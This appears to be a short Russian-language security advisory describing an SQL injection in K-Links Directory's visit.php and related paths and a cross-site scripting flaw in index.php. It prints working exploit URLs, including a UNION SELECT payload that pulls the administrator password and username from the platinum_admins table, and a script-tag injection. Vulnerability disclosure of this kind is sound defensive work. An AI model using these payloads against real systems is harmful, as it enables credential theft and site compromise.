Программа: K-Links Directory
Уязвимость позволяет удаленному пользователю произвести XSS нападение
выполнить произвольные SQL команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных
сценарием visit.php. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.
Эксплоит:
http://host/report/-1[SQL]
http://host/visit.php?id=-1[SQL]
http://host/addreview/-1[SQL]
http://host/refer/-1[SQL]
http://host/report/-1 union select 1,2,3,concat(a_pass,0x3a,a_user),
5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9, 1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8
from platinum_admins where a_id=1/*
2) Уязвимость существует из-за недостаточной обработки входных данных
сценарием index.php. Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
http://host/index.php?req=login&redirect= &login_message=<script>alert()</script>
